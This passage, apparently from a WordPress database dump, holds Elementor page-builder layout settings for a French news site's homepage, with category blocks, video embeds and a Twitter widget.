.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#bf0204\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2371,762,'_elementor_version','0.4'),(2373,763,'_elementor_edit_mode','builder'),(2374,763,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#bf0204\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\